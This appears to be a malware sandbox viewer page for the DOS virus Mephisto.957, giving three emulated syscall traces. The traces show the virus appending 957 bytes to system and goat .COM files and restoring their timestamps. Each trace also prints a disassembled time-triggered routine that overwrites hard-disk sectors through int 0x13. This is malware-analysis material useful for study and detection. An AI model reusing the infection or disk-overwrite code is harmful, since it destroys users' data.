Sample viewer

vx.netlux.org/Virus.DOS.Mephisto.957

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:24:07.728457251Z 26 PC: 12bd8 | Set disk transfer address
2018-12-17T22:24:07.730070029Z 67 PC: 12c81 | Get or set file attributes
2018-12-17T22:24:07.739711069Z 61 PC: 12c86 | Open file (Filename = 'c:\dos\doskey.com')
2018-12-17T22:24:07.746204731Z 67 PC: 12c81 | Get or set file attributes
2018-12-17T22:24:08.110531414Z 61 PC: 12c86 | Open file (Filename = 'c:\dos\edit.com')
2018-12-17T22:24:08.117240673Z 87 PC: 12c8e | Get or set file date and time
2018-12-17T22:24:08.118583837Z 63 PC: 12c9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:24:08.124439805Z 66 PC: 12cab | Move file pointer
2018-12-17T22:24:08.126870347Z 64 PC: 12ba2 | Write file or device (Write 957 bytes on handle 5)
2018-12-17T22:24:08.134211125Z 66 PC: 12cdb | Move file pointer
2018-12-17T22:24:08.136421998Z 64 PC: 12ce6 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:24:08.142103409Z 87 PC: 12ced | Get or set file date and time
2018-12-17T22:24:08.143503828Z 62 PC: 12cf1 | Close file
2018-12-17T22:24:08.151636357Z 67 PC: 12c81 | Get or set file attributes
2018-12-17T22:24:08.165837603Z 61 PC: 12c86 | Open file (Filename = 'c:\windows\win.com')
2018-12-17T22:24:08.174096238Z 87 PC: 12c8e | Get or set file date and time
2018-12-17T22:24:08.176310722Z 63 PC: 12c9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:24:08.180149905Z 66 PC: 12cab | Move file pointer
2018-12-17T22:24:08.18154774Z 64 PC: 12ba2 | Write file or device (Write 957 bytes on handle 5)
2018-12-17T22:24:08.188277744Z 66 PC: 12cdb | Move file pointer
2018-12-17T22:24:08.189326127Z 64 PC: 12ce6 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:24:08.191133625Z 87 PC: 12ced | Get or set file date and time
2018-12-17T22:24:08.192424116Z 62 PC: 12cf1 | Close file
2018-12-17T22:24:08.19718985Z 78 PC: 12bf5 | Find first file
2018-12-17T22:24:08.20289203Z 67 PC: 12c81 | Get or set file attributes
2018-12-17T22:24:08.218878703Z 61 PC: 12c86 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:24:08.22541093Z 87 PC: 12c8e | Get or set file date and time
2018-12-17T22:24:08.226609598Z 63 PC: 12c9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:24:08.232837761Z 66 PC: 12cab | Move file pointer
2018-12-17T22:24:08.234913604Z 64 PC: 12ba2 | Write file or device (Write 957 bytes on handle 5)
2018-12-17T22:24:08.243932622Z 66 PC: 12cdb | Move file pointer
2018-12-17T22:24:08.245958723Z 64 PC: 12ce6 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:24:08.252680164Z 87 PC: 12ced | Get or set file date and time
2018-12-17T22:24:08.25452222Z 62 PC: 12cf1 | Close file
2018-12-17T22:24:08.26681301Z 79 PC: 12bf5 | Find next file
2018-12-17T22:24:08.269801543Z 67 PC: 12c81 | Get or set file attributes
2018-12-17T22:24:08.279360471Z 61 PC: 12c86 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:24:08.286130228Z 87 PC: 12c8e | Get or set file date and time
2018-12-17T22:24:08.287649106Z 63 PC: 12c9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:24:08.293792059Z 66 PC: 12cab | Move file pointer
2018-12-17T22:24:08.295193071Z 87 PC: 12ced | Get or set file date and time
2018-12-17T22:24:08.296359615Z 62 PC: 12cf1 | Close file
2018-12-17T22:24:08.300974857Z 79 PC: 12bf5 | Find next file
2018-12-17T22:24:08.303390709Z 67 PC: 12c81 | Get or set file attributes
2018-12-17T22:24:08.312693868Z 61 PC: 12c86 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:24:08.319937324Z 87 PC: 12c8e | Get or set file date and time
2018-12-17T22:24:08.321663138Z 63 PC: 12c9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:24:08.327792344Z 66 PC: 12cab | Move file pointer
2018-12-17T22:24:08.329129137Z 87 PC: 12ced | Get or set file date and time
2018-12-17T22:24:08.330493086Z 62 PC: 12cf1 | Close file
2018-12-17T22:24:08.337352729Z 79 PC: 12bf5 | Find next file
2018-12-17T22:24:08.339717087Z 67 PC: 12c81 | Get or set file attributes
2018-12-17T22:24:08.348896944Z 61 PC: 12c86 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:24:08.355451463Z 87 PC: 12c8e | Get or set file date and time
2018-12-17T22:24:08.356630682Z 63 PC: 12c9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:24:08.36250239Z 66 PC: 12cab | Move file pointer
2018-12-17T22:24:08.365613276Z 87 PC: 12ced | Get or set file date and time
2018-12-17T22:24:08.366860368Z 62 PC: 12cf1 | Close file
2018-12-17T22:24:08.376057354Z 79 PC: 12bf5 | Find next file
2018-12-17T22:24:08.388155271Z 67 PC: 12c81 | Get or set file attributes
2018-12-17T22:24:08.397555465Z 61 PC: 12c86 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:24:08.403765697Z 87 PC: 12c8e | Get or set file date and time
2018-12-17T22:24:08.405923057Z 63 PC: 12c9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:24:08.411922612Z 66 PC: 12cab | Move file pointer
2018-12-17T22:24:08.413269264Z 87 PC: 12ced | Get or set file date and time
2018-12-17T22:24:08.415284433Z 62 PC: 12cf1 | Close file
2018-12-17T22:24:08.42223131Z 79 PC: 12bf5 | Find next file
2018-12-17T22:24:08.424711295Z 67 PC: 12c81 | Get or set file attributes
2018-12-17T22:24:08.434429718Z 61 PC: 12c86 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:24:08.440767963Z 87 PC: 12c8e | Get or set file date and time
2018-12-17T22:24:08.44365209Z 63 PC: 12c9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:24:08.451739062Z 66 PC: 12cab | Move file pointer
2018-12-17T22:24:08.455360122Z 64 PC: 12ba2 | Write file or device (Write 957 bytes on handle 5)
2018-12-17T22:24:08.464451056Z 66 PC: 12cdb | Move file pointer
2018-12-17T22:24:08.466741911Z 64 PC: 12ce6 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:24:08.474576784Z 87 PC: 12ced | Get or set file date and time
2018-12-17T22:24:08.476933748Z 62 PC: 12cf1 | Close file
2018-12-17T22:24:08.487370804Z 79 PC: 12bf5 | Find next file
2018-12-17T22:24:08.490303323Z 67 PC: 12c81 | Get or set file attributes
2018-12-17T22:24:08.500078085Z 61 PC: 12c86 | Open file (Filename = 'PAH.COM')
2018-12-17T22:24:08.507242433Z 87 PC: 12c8e | Get or set file date and time
2018-12-17T22:24:08.508699293Z 63 PC: 12c9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:24:08.514982496Z 66 PC: 12cab | Move file pointer
2018-12-17T22:24:08.517230539Z 87 PC: 12ced | Get or set file date and time
2018-12-17T22:24:08.518613295Z 62 PC: 12cf1 | Close file
2018-12-17T22:24:08.525681372Z 79 PC: 12bf5 | Find next file
2018-12-17T22:24:08.528673421Z 67 PC: 12c81 | Get or set file attributes
2018-12-17T22:24:08.537942317Z 61 PC: 12c86 | Open file (Filename = 'TEST.COM')
2018-12-17T22:24:08.544225055Z 87 PC: 12c8e | Get or set file date and time
2018-12-17T22:24:08.546396965Z 63 PC: 12c9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:24:08.552352836Z 87 PC: 12ced | Get or set file date and time
2018-12-17T22:24:08.553800685Z 62 PC: 12cf1 | Close file
2018-12-17T22:24:08.561954835Z 79 PC: 12bf5 | Find next file
2018-12-17T22:24:08.564293732Z 44 PC: 12c07 | Get time 0x12c07: cmp dl, 1
0x12c0a: ja 0x12c14
0x12c0c: cmp dh, 0x10
0x12c0f: ja 0x12c14
0x12c11: call 0x12c1c
0x12c14: mov dx, 0x80
0x12c17: mov ah, 0x1a
0x12c19: int 0x21
0x12c1b: ret
0x12c1c: lea bx, word ptr [bp + 0x4bd]
0x12c20: mov cx, 1
0x12c23: mov dx, 0x80
0x12c26: mov ax, 0x201
0x12c29: int 0x13
0x12c2b: jb 0x12c1b
0x12c2d: mov ax, 0x301
0x12c30: mov dx, 0x80
0x12c33: mov cx, 2
0x12c36: lea bx, word ptr [bp + 0x4bd]
0x12c3a: int 0x13
2018-12-17T22:24:08.566210628Z 26 PC: 12c1b | Set disk transfer address
2018-12-17T22:24:08.567906144Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-17T22:24:08.571798375Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4232,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:20.897183659Z 26 PC: 12bd8 | Set disk transfer address
2018-12-25T11:51:20.899195644Z 67 PC: 12c81 | Get or set file attributes
2018-12-25T11:51:20.913689225Z 61 PC: 12c86 | Open file (Filename = 'c:\dos\doskey.com')
2018-12-25T11:51:20.921310526Z 67 PC: 12c81 | Get or set file attributes (See above)
2018-12-25T11:51:22.595498231Z 61 PC: 12c86 | Open file (See above)
2018-12-25T11:51:22.604103158Z 87 PC: 12c8e | Get or set file date and time
2018-12-25T11:51:22.606603512Z 63 PC: 12c9b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:51:22.613395201Z 66 PC: 12cab | Move file pointer
2018-12-25T11:51:22.61608383Z 64 PC: 12ba2 | Write file or device (Write 957 bytes on handle 5)
2018-12-25T11:51:22.629853382Z 66 PC: 12cdb | Move file pointer
2018-12-25T11:51:22.631798203Z 64 PC: 12ce6 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:51:22.63908141Z 87 PC: 12ced | Get or set file date and time
2018-12-25T11:51:22.640705179Z 62 PC: 12cf1 | Close file
2018-12-25T11:51:22.647966797Z 67 PC: 12c81 | Get or set file attributes (See above)
2018-12-25T11:51:22.666434956Z 61 PC: 12c86 | Open file (See above)
2018-12-25T11:51:22.674927351Z 87 PC: 12c8e | Get or set file date and time (See above)
2018-12-25T11:51:22.67681006Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T11:51:22.683951401Z 66 PC: 12cab | Move file pointer (See above)
2018-12-25T11:51:22.68655901Z 64 PC: 12ba2 | Write file or device (See above)
2018-12-25T11:51:22.697690068Z 66 PC: 12cdb | Move file pointer (See above)
2018-12-25T11:51:22.700497583Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:51:22.704046112Z 87 PC: 12ced | Get or set file date and time (See above)
2018-12-25T11:51:22.705731381Z 62 PC: 12cf1 | Close file (See above)
2018-12-25T11:51:22.711488696Z 78 PC: 12bf5 | Find first file
2018-12-25T11:51:22.718484911Z 67 PC: 12c81 | Get or set file attributes (See above)
2018-12-25T11:51:22.735725188Z 61 PC: 12c86 | Open file (See above)
2018-12-25T11:51:22.740366444Z 87 PC: 12c8e | Get or set file date and time (See above)
2018-12-25T11:51:22.74207692Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T11:51:22.748706468Z 66 PC: 12cab | Move file pointer (See above)
2018-12-25T11:51:22.750588758Z 64 PC: 12ba2 | Write file or device (See above)
2018-12-25T11:51:22.766190562Z 66 PC: 12cdb | Move file pointer (See above)
2018-12-25T11:51:22.768226125Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:51:22.776136585Z 87 PC: 12ced | Get or set file date and time (See above)
2018-12-25T11:51:22.77984978Z 62 PC: 12cf1 | Close file (See above)
2018-12-25T11:51:22.796570321Z 79 PC: 12bf5 | Find next file (See above)
2018-12-25T11:51:22.799730946Z 67 PC: 12c81 | Get or set file attributes (See above)
2018-12-25T11:51:22.812131517Z 61 PC: 12c86 | Open file (See above)
2018-12-25T11:51:22.820207513Z 87 PC: 12c8e | Get or set file date and time (See above)
2018-12-25T11:51:22.821743189Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T11:51:22.83031154Z 66 PC: 12cab | Move file pointer (See above)
2018-12-25T11:51:22.832656071Z 87 PC: 12ced | Get or set file date and time (See above)
2018-12-25T11:51:22.834766891Z 62 PC: 12cf1 | Close file (See above)
2018-12-25T11:51:22.843187818Z 79 PC: 12bf5 | Find next file (See above)
2018-12-25T11:51:22.84687302Z 67 PC: 12c81 | Get or set file attributes (See above)
2018-12-25T11:51:22.858059784Z 61 PC: 12c86 | Open file (See above)
2018-12-25T11:51:22.865927397Z 87 PC: 12c8e | Get or set file date and time (See above)
2018-12-25T11:51:22.86909834Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T11:51:22.877391936Z 66 PC: 12cab | Move file pointer (See above)
2018-12-25T11:51:22.878878508Z 87 PC: 12ced | Get or set file date and time (See above)
2018-12-25T11:51:22.880967304Z 62 PC: 12cf1 | Close file (See above)
2018-12-25T11:51:22.889003975Z 79 PC: 12bf5 | Find next file (See above)
2018-12-25T11:51:22.891805701Z 67 PC: 12c81 | Get or set file attributes (See above)
2018-12-25T11:51:22.903647764Z 61 PC: 12c86 | Open file (See above)
2018-12-25T11:51:22.911501756Z 87 PC: 12c8e | Get or set file date and time (See above)
2018-12-25T11:51:22.913033465Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T11:51:22.920913231Z 66 PC: 12cab | Move file pointer (See above)
2018-12-25T11:51:22.922687996Z 87 PC: 12ced | Get or set file date and time (See above)
2018-12-25T11:51:22.924731057Z 62 PC: 12cf1 | Close file (See above)
2018-12-25T11:51:22.938659713Z 79 PC: 12bf5 | Find next file (See above)
2018-12-25T11:51:22.941757278Z 67 PC: 12c81 | Get or set file attributes (See above)
2018-12-25T11:51:22.956426022Z 61 PC: 12c86 | Open file (See above)
2018-12-25T11:51:22.965092631Z 87 PC: 12c8e | Get or set file date and time (See above)
2018-12-25T11:51:22.967244872Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T11:51:22.972053639Z 66 PC: 12cab | Move file pointer (See above)
2018-12-25T11:51:22.97334474Z 87 PC: 12ced | Get or set file date and time (See above)
2018-12-25T11:51:22.975404326Z 62 PC: 12cf1 | Close file (See above)
2018-12-25T11:51:22.982822668Z 79 PC: 12bf5 | Find next file (See above)
2018-12-25T11:51:22.985929899Z 67 PC: 12c81 | Get or set file attributes (See above)
2018-12-25T11:51:22.997469836Z 61 PC: 12c86 | Open file (See above)
2018-12-25T11:51:23.004679396Z 87 PC: 12c8e | Get or set file date and time (See above)
2018-12-25T11:51:23.00633912Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T11:51:23.013171756Z 66 PC: 12cab | Move file pointer (See above)
2018-12-25T11:51:23.015164507Z 64 PC: 12ba2 | Write file or device (See above)
2018-12-25T11:51:23.023590831Z 66 PC: 12cdb | Move file pointer (See above)
2018-12-25T11:51:23.025456198Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:51:23.031533591Z 87 PC: 12ced | Get or set file date and time (See above)
2018-12-25T11:51:23.033197335Z 62 PC: 12cf1 | Close file (See above)
2018-12-25T11:51:23.04240714Z 79 PC: 12bf5 | Find next file (See above)
2018-12-25T11:51:23.04632985Z 67 PC: 12c81 | Get or set file attributes (See above)
2018-12-25T11:51:23.055318665Z 61 PC: 12c86 | Open file (See above)
2018-12-25T11:51:23.061685824Z 87 PC: 12c8e | Get or set file date and time (See above)
2018-12-25T11:51:23.06424724Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T11:51:23.070316906Z 66 PC: 12cab | Move file pointer (See above)
2018-12-25T11:51:23.071883501Z 87 PC: 12ced | Get or set file date and time (See above)
2018-12-25T11:51:23.074325301Z 62 PC: 12cf1 | Close file (See above)
2018-12-25T11:51:23.08127894Z 79 PC: 12bf5 | Find next file (See above)
2018-12-25T11:51:23.084051667Z 67 PC: 12c81 | Get or set file attributes (See above)
2018-12-25T11:51:23.093413017Z 61 PC: 12c86 | Open file (See above)
2018-12-25T11:51:23.100745168Z 87 PC: 12c8e | Get or set file date and time (See above)
2018-12-25T11:51:23.102264117Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T11:51:23.109652973Z 87 PC: 12ced | Get or set file date and time (See above)
2018-12-25T11:51:23.111235966Z 62 PC: 12cf1 | Close file (See above)
2018-12-25T11:51:23.11895137Z 79 PC: 12bf5 | Find next file (See above)
2018-12-25T11:51:23.122415509Z 44 PC: 12c07 | Get time 0x12c07: cmp dl, 1
0x12c0a: ja 0x12c14
0x12c0c: cmp dh, 0x10
0x12c0f: ja 0x12c14
0x12c11: call 0x12c1c
0x12c14: mov dx, 0x80
0x12c17: mov ah, 0x1a
0x12c19: int 0x21
0x12c1b: ret
0x12c1c: lea bx, word ptr [bp + 0x4bd]
0x12c20: mov cx, 1
0x12c23: mov dx, 0x80
0x12c26: mov ax, 0x201
0x12c29: int 0x13
0x12c2b: jb 0x12c1b
0x12c2d: mov ax, 0x301
0x12c30: mov dx, 0x80
0x12c33: mov cx, 2
0x12c36: lea bx, word ptr [bp + 0x4bd]
0x12c3a: int 0x13
2018-12-25T11:51:23.125449455Z 26 PC: 12c1b | Set disk transfer address
2018-12-25T11:51:23.127015656Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T11:51:23.134299869Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":17,"TimeBased":true,"OriginalID":4232,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:21.016482121Z 26 PC: 12bd8 | Set disk transfer address
2018-12-25T11:51:21.017727639Z 67 PC: 12c81 | Get or set file attributes
2018-12-25T11:51:21.028492119Z 61 PC: 12c86 | Open file (Filename = 'c:\dos\doskey.com')
2018-12-25T11:51:21.035930353Z 67 PC: 12c81 | Get or set file attributes (See above)
2018-12-25T11:51:22.593591997Z 61 PC: 12c86 | Open file (See above)
2018-12-25T11:51:22.601731363Z 87 PC: 12c8e | Get or set file date and time
2018-12-25T11:51:22.603713942Z 63 PC: 12c9b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:51:22.61080287Z 66 PC: 12cab | Move file pointer
2018-12-25T11:51:22.614239979Z 64 PC: 12ba2 | Write file or device (Write 957 bytes on handle 5)
2018-12-25T11:51:22.629867408Z 66 PC: 12cdb | Move file pointer
2018-12-25T11:51:22.63237629Z 64 PC: 12ce6 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:51:22.643131857Z 87 PC: 12ced | Get or set file date and time
2018-12-25T11:51:22.646579046Z 62 PC: 12cf1 | Close file
2018-12-25T11:51:22.654969912Z 67 PC: 12c81 | Get or set file attributes (See above)
2018-12-25T11:51:22.668103524Z 61 PC: 12c86 | Open file (See above)
2018-12-25T11:51:22.67658104Z 87 PC: 12c8e | Get or set file date and time (See above)
2018-12-25T11:51:22.678641203Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T11:51:22.695575278Z 66 PC: 12cab | Move file pointer (See above)
2018-12-25T11:51:22.698278409Z 64 PC: 12ba2 | Write file or device (See above)
2018-12-25T11:51:22.710151636Z 66 PC: 12cdb | Move file pointer (See above)
2018-12-25T11:51:22.712161227Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:51:22.71714114Z 87 PC: 12ced | Get or set file date and time (See above)
2018-12-25T11:51:22.719327815Z 62 PC: 12cf1 | Close file (See above)
2018-12-25T11:51:22.728549337Z 78 PC: 12bf5 | Find first file
2018-12-25T11:51:22.736454928Z 67 PC: 12c81 | Get or set file attributes (See above)
2018-12-25T11:51:22.754694777Z 61 PC: 12c86 | Open file (See above)
2018-12-25T11:51:22.762464317Z 87 PC: 12c8e | Get or set file date and time (See above)
2018-12-25T11:51:22.765095005Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T11:51:22.774872546Z 66 PC: 12cab | Move file pointer (See above)
2018-12-25T11:51:22.77734095Z 64 PC: 12ba2 | Write file or device (See above)
2018-12-25T11:51:22.796544144Z 66 PC: 12cdb | Move file pointer (See above)
2018-12-25T11:51:22.808557005Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:51:22.816265758Z 87 PC: 12ced | Get or set file date and time (See above)
2018-12-25T11:51:22.819166235Z 62 PC: 12cf1 | Close file (See above)
2018-12-25T11:51:22.837418427Z 79 PC: 12bf5 | Find next file (See above)
2018-12-25T11:51:22.840404552Z 67 PC: 12c81 | Get or set file attributes (See above)
2018-12-25T11:51:22.852191527Z 61 PC: 12c86 | Open file (See above)
2018-12-25T11:51:22.862902695Z 87 PC: 12c8e | Get or set file date and time (See above)
2018-12-25T11:51:22.864740917Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T11:51:22.871959557Z 66 PC: 12cab | Move file pointer (See above)
2018-12-25T11:51:22.874349422Z 87 PC: 12ced | Get or set file date and time (See above)
2018-12-25T11:51:22.876351322Z 62 PC: 12cf1 | Close file (See above)
2018-12-25T11:51:22.884859076Z 79 PC: 12bf5 | Find next file (See above)
2018-12-25T11:51:22.888200099Z 67 PC: 12c81 | Get or set file attributes (See above)
2018-12-25T11:51:22.898762359Z 61 PC: 12c86 | Open file (See above)
2018-12-25T11:51:22.906875764Z 87 PC: 12c8e | Get or set file date and time (See above)
2018-12-25T11:51:22.908990065Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T11:51:22.916616679Z 66 PC: 12cab | Move file pointer (See above)
2018-12-25T11:51:22.918329246Z 87 PC: 12ced | Get or set file date and time (See above)
2018-12-25T11:51:22.920505556Z 62 PC: 12cf1 | Close file (See above)
2018-12-25T11:51:22.925841688Z 79 PC: 12bf5 | Find next file (See above)
2018-12-25T11:51:22.929074367Z 67 PC: 12c81 | Get or set file attributes (See above)
2018-12-25T11:51:22.940438142Z 61 PC: 12c86 | Open file (See above)
2018-12-25T11:51:22.948213888Z 87 PC: 12c8e | Get or set file date and time (See above)
2018-12-25T11:51:22.949737413Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T11:51:22.956913804Z 66 PC: 12cab | Move file pointer (See above)
2018-12-25T11:51:22.959127369Z 87 PC: 12ced | Get or set file date and time (See above)
2018-12-25T11:51:22.961185929Z 62 PC: 12cf1 | Close file (See above)
2018-12-25T11:51:22.969986715Z 79 PC: 12bf5 | Find next file (See above)
2018-12-25T11:51:22.973148987Z 67 PC: 12c81 | Get or set file attributes (See above)
2018-12-25T11:51:22.984135952Z 61 PC: 12c86 | Open file (See above)
2018-12-25T11:51:22.991476505Z 87 PC: 12c8e | Get or set file date and time (See above)
2018-12-25T11:51:22.993848189Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T11:51:23.000792228Z 66 PC: 12cab | Move file pointer (See above)
2018-12-25T11:51:23.002297664Z 87 PC: 12ced | Get or set file date and time (See above)
2018-12-25T11:51:23.004857343Z 62 PC: 12cf1 | Close file (See above)
2018-12-25T11:51:23.012524188Z 79 PC: 12bf5 | Find next file (See above)
2018-12-25T11:51:23.01519005Z 67 PC: 12c81 | Get or set file attributes (See above)
2018-12-25T11:51:23.02685902Z 61 PC: 12c86 | Open file (See above)
2018-12-25T11:51:23.040543443Z 87 PC: 12c8e | Get or set file date and time (See above)
2018-12-25T11:51:23.042162615Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T11:51:23.049970897Z 66 PC: 12cab | Move file pointer (See above)
2018-12-25T11:51:23.052196093Z 64 PC: 12ba2 | Write file or device (See above)
2018-12-25T11:51:23.062511803Z 66 PC: 12cdb | Move file pointer (See above)
2018-12-25T11:51:23.065047075Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:51:23.072864044Z 87 PC: 12ced | Get or set file date and time (See above)
2018-12-25T11:51:23.07450857Z 62 PC: 12cf1 | Close file (See above)
2018-12-25T11:51:23.084920255Z 79 PC: 12bf5 | Find next file (See above)
2018-12-25T11:51:23.087775419Z 67 PC: 12c81 | Get or set file attributes (See above)
2018-12-25T11:51:23.098826696Z 61 PC: 12c86 | Open file (See above)
2018-12-25T11:51:23.106226756Z 87 PC: 12c8e | Get or set file date and time (See above)
2018-12-25T11:51:23.108124465Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T11:51:23.11511248Z 66 PC: 12cab | Move file pointer (See above)
2018-12-25T11:51:23.116552832Z 87 PC: 12ced | Get or set file date and time (See above)
2018-12-25T11:51:23.1189409Z 62 PC: 12cf1 | Close file (See above)
2018-12-25T11:51:23.126613803Z 79 PC: 12bf5 | Find next file (See above)
2018-12-25T11:51:23.129394268Z 67 PC: 12c81 | Get or set file attributes (See above)
2018-12-25T11:51:23.140632087Z 61 PC: 12c86 | Open file (See above)
2018-12-25T11:51:23.148197621Z 87 PC: 12c8e | Get or set file date and time (See above)
2018-12-25T11:51:23.150526933Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T11:51:23.158622427Z 87 PC: 12ced | Get or set file date and time (See above)
2018-12-25T11:51:23.160199741Z 62 PC: 12cf1 | Close file (See above)
2018-12-25T11:51:23.168012437Z 79 PC: 12bf5 | Find next file (See above)
2018-12-25T11:51:23.171200409Z 44 PC: 12c07 | Get time 0x12c07: cmp dl, 1
0x12c0a: ja 0x12c14
0x12c0c: cmp dh, 0x10
0x12c0f: ja 0x12c14
0x12c11: call 0x12c1c
0x12c14: mov dx, 0x80
0x12c17: mov ah, 0x1a
0x12c19: int 0x21
0x12c1b: ret
0x12c1c: lea bx, word ptr [bp + 0x4bd]
0x12c20: mov cx, 1
0x12c23: mov dx, 0x80
0x12c26: mov ax, 0x201
0x12c29: int 0x13
0x12c2b: jb 0x12c1b
0x12c2d: mov ax, 0x301
0x12c30: mov dx, 0x80
0x12c33: mov cx, 2
0x12c36: lea bx, word ptr [bp + 0x4bd]
0x12c3a: int 0x13
2018-12-25T11:51:23.173527568Z 26 PC: 12c1b | Set disk transfer address
2018-12-25T11:51:23.174580676Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T11:51:23.181926143Z 76 PC: 12a86 | Terminate with return code (Return code = '36')